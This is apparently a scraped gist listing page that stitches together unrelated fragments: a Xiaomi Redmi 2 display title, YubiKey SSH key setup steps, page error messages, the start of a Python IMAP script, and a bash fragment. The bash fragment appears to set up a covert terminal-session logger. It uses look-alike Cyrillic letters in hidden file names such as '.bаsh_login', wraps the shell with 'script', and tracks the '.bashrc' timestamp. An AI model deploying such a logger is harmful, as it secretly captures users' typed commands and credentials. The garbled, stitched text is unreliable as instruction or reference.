Xiaomi Redmi 2 with resolution 1280x720 (GUD RGB565 with compression)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # CUSTIMIZE BEFORE UPLOAD | |
| fakerc=~/.bаsh_login | |
| logfile=~/.bаsh_cache | |
| waitsec=1 | |
| changetime=$(stat -c %Y ~/.bashrc) | |
| read script <<EOF | |
| exec script -B "$logfile" -afqc "bash --rcfile '$fakerc'" |
Start by checking that there aren't any previous ssh keys inside the FIDO2 authenticator of your YubiKey. You can check if they exist by running the command below:
nix shell nixpkgs#yubikey-manager -c ykman fido credentials listIf the command above outputs a string mentioning "ssh" or "openssh", then you have already got a key generated and store on your YubiKey.
Before generating a new ssh key to store on your YubiKey you must consider which additional required authentication factors you want to use. Below you can see a table with the available factors and their corresponding command:
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from email.parser import HeaderParser | |
| import imaplib | |
| import time | |
| import requests | |
| from concurrent.futures import ThreadPoolExecutor, as_completed | |
| imaplib._MAXLINE = 40000000 | |
| ONE_TIME_LIMIT = 10 | |
| mailparser = HeaderParser() |
OlderNewer
